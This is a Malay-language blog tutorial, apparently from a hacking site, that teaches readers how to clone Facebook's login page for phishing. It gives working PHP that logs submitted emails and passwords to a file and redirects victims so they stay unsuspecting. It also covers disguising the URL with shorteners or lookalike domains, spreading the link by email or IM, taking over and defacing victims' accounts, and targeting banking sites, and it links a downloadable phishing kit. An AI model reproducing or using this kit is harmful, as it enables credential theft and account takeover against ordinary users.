Kentut Loi: web palsu (Phishing)

Salam Sejahtera , pejam celik kita dah nak masuk bulan Ramadhan dah , rasanya baru je KH post pasal laman 1pengguna.com yang dapat diceroboh , rupanya sudah hampir 2 bulan KenaHack.com ditalian. Terima kasih kerana menyokong.

Kaedah Phishing turut dijelaskan dalam artikel KH sebelum ini yang bertajuk 10 Cara menceroboh laman facebook , namunpun begitu bukan sahaja facebook yang boleh diphishing tau , ianya meliputi keseluruhan laman yang menggunakan login kerana phishing beroperasi untuk mendapatkan maklumat login tersebut.

Kali ini KH akan tunjukkan bagaimana laman facebook ditiru.

Langkah :

[1] - Pergi ke laman yang ingin ditiru. Bagi kes ini , KH akan tiru laman facebook.com. Simpan laman facebook ini PC anda melalui " Save page as " , buat satu folder baharu bagi memudahkan kerja anda. Perhatikan gambar dibawah. KH menggunakan pelayar Chrome , usah risau kerana pelayar lain turut mempunyai fungsi wget ini.

[2] - Jika "penyimpanan" anda berjaya , maka anda akan memiliki fail seperti gambar dibawah. KH letakkan dalam folder Phishing yang turut diletakkan dalam localhost. Anda akan memiliki satu fail jenis .html yang menggunakan title default facebook dan juga satu folder fail yang link dengan fail .html tersebut. Jika anda mempunyai sedikit sebanyak ilmu berkaitan , maka anda boleh "linking" balik .html dengan host facebook.com sebenar ( link utk javascript / gambar dan lain-lain ). Jika tidak , anda perlu memuatnaik fail yang terdapat dalam folder tersebut kedalam host anda. Bagi kes ini , KH menggunakan fail dalam folder tersebut tanpa mengubah link pada fail .htmlitu.

[3] - Buka fail .html tersebut dengan menggunakan "notepad" .

[4] - Cari script "<form" kerana dibahagian inilah form yang digunakan untuk login. Maka kita perlu memanipulasikan fungsi "post form" itu.

[5] - Jika anda perhatikan pada gambar dibawah, KH highlight kan fungsi "<form" yang digunakan untuk login.

[7] - Gambar dibawah merujuk kepada fail yang digunakan facebook untuk mendapatkan pengesahan melalui email dan password yang kita masukkan. Jadi , kita perlu menggunakan fail kita sendiri bagi mendapatkan email dan password yang kita / mangsa masukkan pada login form.

[8] - KH menggunakan nama fail "pengarah.php" bagi memudahkan pemahaman pembaca semua. Jadi, dengan ini , jika anda / mangsa isi form pada login page maka akan diarahkan untuk ke fail pengarah.php yang akan kita cipta nanti.

[9] - Contohnya dibawah ini , KH cuba isi form login dan klik Log In.

Maka data yang kita masukkan akan diterima oleh fail pengarah.php seperti yang ditunjukkan gambar dibawah. Namun begitu , fail pengarah.php belumpun kita cipta maka akan keluar error seperti dalam gambar ini.

[10] - Sekarang kita cipta fail pengarah.php yang akan merakam maklumat yang kita masukkan kat login page. Pergi ke folder anda tadi dan buat satu document yang kemudiannya disave dalam format .php

Masukkan script PHP seperti dalam gambar dibawah. Penggunaan redirect url facebook.com akan menggelakkan syak wasangka mangsa anda.

Script PHP yang digunakan :

<?php

header ('Location: http://www.facebook.com/ ');

$handle = fopen("data.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

[11] - Jadi, sehingga sekarang anda akan memiliki 3 fail iaitu fail .html , folder bagi fail .html dan juga ffailpengarah.php yang baru dicipta sebentar tadi.

Jadi , jika anda ikuti langkah [9] tadi maka tidak akan dapat error seperti dalam gambar tersebut. Ini kerana failpengarah.php sudah tercipta seperti gambar dibawah. Namunpun begitu , arahan pada fail pengarah.php akan redirectkan pagenya kepada laman facebook.com seperti yang kita arahkan pada gambar [10]

[12] - Jika anda berjaya memiliki fail seperti gambar [11] , maka laman tiruan anda berjaya. Melalui arahan failpengarah.php yang akan menulis data yang dimasukkan pada fail data.txt , maka anda akan memiliki satu fail data.txtyang mempunyai maklumat seperti yang dimasukkan pada login page ( gambar [9] )

Perhatikan gambar dibawah , dalam folder yang anda cipta kini telah memiliki 4 fail kerana pengarah.php telah mencipta satu lagi fail iaitu data.txt

[13] - Bagi memperkemaskan lagi laman , tukar nama fail .html kepada index / default seperti gambar dibawah.

Maka URL / path fail phishing anda akan lebih kemas seperti gambar dibawah.

[14] - Setelah memuatnaik semua fail phishing anda tadi ke host , maka anda akan memiliki URL / alamat lamanphishing facebook anda. namunpun begitu , URL / alamat yang mencurigakan akan mengelakkan mangsa untuk membuka laman tersebut. Maka , anda boleh gunakan fungsi URL shortener tidak kira la melalui google , tinyurl atauapa-apa provider. Jika anda ingin guna direct link , pastikan URL / domain anda menarik untuk diklik. Contohnya : Facebook.co.cc

[15] - Seterusnya , sebarkan laman phishing anda. Anda boleh menggunakan apa jua cara bagi membolehkan laman phishing ini tersebar termasuk melalui email atau IM.

Muatturun folder phishing seperti diatas : http://kenahack.com.fail.jenis.zip.mycrews.info/phishing.zip

Situasi :

1 - Mangsa yg sedang online akan klik pada laman phishing

2 - Mangsa diarahkan untuk mengisi kembali email dan password

3 - Mangsa akan kembali ke page facebook.com tanpa syak wasangka bahawa log mereka sudah ada pada faildata.txt :D

4 - Anda buka fail data.txt dan dapatkan email dan password mangsa.

5 - Anda login sebagai mangsa dan tukar password anda ( cuba login email skali kalau boleh )

6 - Tinggalkan jejak bahawa akaun tersebut telah di ceroboh :D

Teknik phishing ini juga boleh dilakukan pada semua laman yang menggunakan login form termasuk laman perbankkan , namunpun begitu , terserah pada pemangsa untuk menggunakan teknik ini untuk tujuan mereka.

Antara laman yang KH katakan boleh diphishing juga melalui teknik pengubahsuaian "<form" . Teknik seterusnya boleh ikuti langkah diatas.

Laman yang popular di Malaysia ( mudah.my )